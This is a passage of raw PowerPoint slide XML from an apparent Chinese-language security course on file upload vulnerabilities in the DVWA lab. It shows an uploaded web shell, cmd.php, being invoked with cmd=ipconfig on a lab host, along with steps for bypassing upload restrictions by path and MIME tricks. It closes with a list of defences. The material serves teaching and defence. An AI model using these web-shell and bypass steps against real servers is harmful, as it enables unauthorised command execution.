            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>请求发送给服务器，这样即可通过程序验</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>证</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>cmd.ph</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>文件 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>上传成功，如图所</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>示</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2101475" y="2958373"/>
            <a:ext cx="667385"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上传</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-5">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-5" b="1">
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>文件成功</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="846213" y="1737360"/>
            <a:ext cx="2975610" cy="1130046"/>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849261" y="1739645"/>
            <a:ext cx="2970530" cy="1123315"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2970529" h="1123314">
                <a:moveTo>
                  <a:pt x="0" y="1123188"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2970276" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2970276" y="1123188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1123188"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>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880276"/>
            <a:ext cx="3383915" cy="340995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="21590" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" marL="151130" marR="5080" indent="-139065">
              <a:lnSpc>
                <a:spcPts val="810"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="17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6</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>192.168.20.34/dvwa/hackable/uploads/cmd.php?cmd=ipconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>访问所 上传的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>文件，并传递参数</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>ipconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>这样就可以获取服务器的网络信息，如图 所示。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2738761" y="2255682"/>
            <a:ext cx="521970" cy="124460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="12065" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" b="1">
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>显示网</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-10" b="1">
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>络信</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-5" b="1">
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>息</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1364627" y="1368425"/>
            <a:ext cx="3412235" cy="68199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366913" y="1370711"/>
            <a:ext cx="3404870" cy="676275"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3404870" h="676275">
                <a:moveTo>
                  <a:pt x="0" y="675894"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3404616" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3404616" y="675894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="675894"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>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979" y="3096610"/>
            <a:ext cx="208279"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11</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203708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文件上传漏洞的测试流程</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="715397" y="880276"/>
            <a:ext cx="3326129" cy="814069"/>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1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）先按照正常的上传要求做一次完整的上</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>传</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，上传过程中可抓取数据包，查 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>看数据包及返回结果</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>等</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="38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2</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>尝试上传不同类型的恶意脚本文</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>件</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，比</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>abc.jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>a.php</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>文</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>件</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" marR="5080" indent="-139065">
              <a:lnSpc>
                <a:spcPts val="810"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="455"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>（</a:t>
            </a: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）查看系统是否在前端做了上传限制</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>如文件类型、文件大小的限制，并尝 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>试使用不同方式绕过这些限</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>制</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，如路径绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>MIME</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>类型绕</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>过</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="380"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>利用报错或者猜测等其他方式得到木马路</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>径</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，连接即可访问。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>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1115896"/>
            <a:ext cx="112268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文件上传防御</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="62865" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="495"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" spc="15"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="15">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="15"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="20"/>
              <a:t>在服务器上存储用户上传的文件时，对文件进行重命名。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="405"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" spc="15"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="15">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="15"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="20"/>
              <a:t>检查用户上传的文件的类型和大小。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" spc="15"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="15">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="15"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="20"/>
              <a:t>禁止上传危险的文件类型（如</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="5"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="5">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>.jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="20"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-5">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="20"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="5">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>.sh</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="20"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="5">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>.war</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="20"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>.jar</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="20"/>
              <a:t>等）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="405"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" spc="15"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="15">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="15"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
